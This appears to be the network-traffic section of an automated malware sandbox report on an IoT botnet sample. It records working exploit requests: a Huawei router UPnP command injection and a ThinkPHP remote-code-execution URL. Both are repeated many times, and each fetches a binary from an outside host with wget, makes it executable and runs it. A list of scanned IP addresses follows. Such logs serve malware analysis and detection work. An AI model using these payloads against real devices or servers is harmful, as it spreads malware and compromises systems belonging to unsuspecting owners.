    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.62.248.103 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /UserData Raw: Data Ascii:
    Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
    Source: unknownTCP traffic detected without corresponding DNS query: 41.103.255.119
    Source: unknownTCP traffic detected without corresponding DNS query: 41.241.238.185
    Source: unknownTCP traffic detected without corresponding DNS query: 41.34.180.186
    Source: unknownTCP traffic detected without corresponding DNS query: 41.25.222.50
    Source: unknownTCP traffic detected without corresponding DNS query: 41.62.98.169
    Source: unknownTCP traffic detected without corresponding DNS query: 41.128.191.249
    Source: unknownTCP traffic detected without corresponding DNS query: 41.215.199.179
    Source: unknownTCP traffic detected without corresponding DNS query: 41.38.67.205
    Source: unknownTCP traffic detected without corresponding DNS query: 41.175.116.212
    Source: unknownTCP traffic detected without corresponding DNS query: 41.254.37.193
    Source: unknownTCP traffic detected without corresponding DNS query: 41.79.5.54
    Source: unknownTCP traffic detected without corresponding DNS query: 41.234.93.130
    Source: unknownTCP traffic detected without corresponding DNS query: 41.9.2.223
    Source: unknownTCP traffic detected without corresponding DNS query: 41.96.11.125
    Source: unknownTCP traffic detected without corresponding DNS query: 41.117.99.248
    Source: unknownTCP traffic detected without corresponding DNS query: 41.207.217.135
    Source: unknownTCP traffic detected without corresponding DNS query: 41.149.49.154
    Source: unknownTCP traffic detected without corresponding DNS query: 41.8.20.16
    Source: unknownTCP traffic detected without corresponding DNS query: 41.137.40.18
    Source: unknownTCP traffic detected without corresponding DNS query: 41.37.225.242
    Source: unknownTCP traffic detected without corresponding DNS query: 41.215.169.194
    Source: unknownTCP traffic detected without corresponding DNS query: 41.22.202.60
    Source: unknownTCP traffic detected without corresponding DNS query: 41.92.144.239
    Source: unknownTCP traffic detected without corresponding DNS query: 41.187.202.149
    Source: unknownTCP traffic detected without corresponding DNS query: 41.28.32.66
    Source: unknownTCP traffic detected without corresponding DNS query: 41.67.177.145
    Source: unknownTCP traffic detected without corresponding DNS query: 41.235.165.4
    Source: unknownTCP traffic detected without corresponding DNS query: 41.193.29.13
    Source: unknownTCP traffic detected without corresponding DNS query: 41.220.109.132
    Source: unknownTCP traffic detected without corresponding DNS query: 41.226.143.27
    Source: unknownTCP traffic detected without corresponding DNS query: 41.187.206.124
    Source: unknownTCP traffic detected without corresponding DNS query: 41.64.0.254
    Source: unknownTCP traffic detected without corresponding DNS query: 41.198.1.68
    Source: unknownTCP traffic detected without corresponding DNS query: 41.245.240.200
    Source: unknownTCP traffic detected without corresponding DNS query: 41.182.187.51
    Source: unknownTCP traffic detected without corresponding DNS query: 41.32.111.53
    Source: unknownTCP traffic detected without corresponding DNS query: 41.191.134.132
    Source: unknownTCP traffic detected without corresponding DNS query: 41.238.118.64
    Source: unknownTCP traffic detected without corresponding DNS query: 41.209.151.176
    Source: unknownTCP traffic detected without corresponding DNS query: 41.139.215.224
    Source: unknownTCP traffic detected without corresponding DNS query: 41.1.155.31
    Source: unknownTCP traffic detected without corresponding DNS query: 41.29.2.100
    Source: unknownTCP traffic detected without corresponding DNS query: 41.187.180.240
    Source: unknownTCP traffic detected without corresponding DNS query: 41.201.63.20
    Source: unknownTCP traffic detected without corresponding DNS query: 41.116.111.67
    Source: unknownTCP traffic detected without corresponding DNS query: 41.167.106.235
    Source: unknownTCP traffic detected without corresponding DNS query: 41.244.136.137
    Source: unknownTCP traffic detected without corresponding DNS query: 41.50.72.18
    Source: unknownTCP traffic detected without corresponding DNS query: 41.144.37.246
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
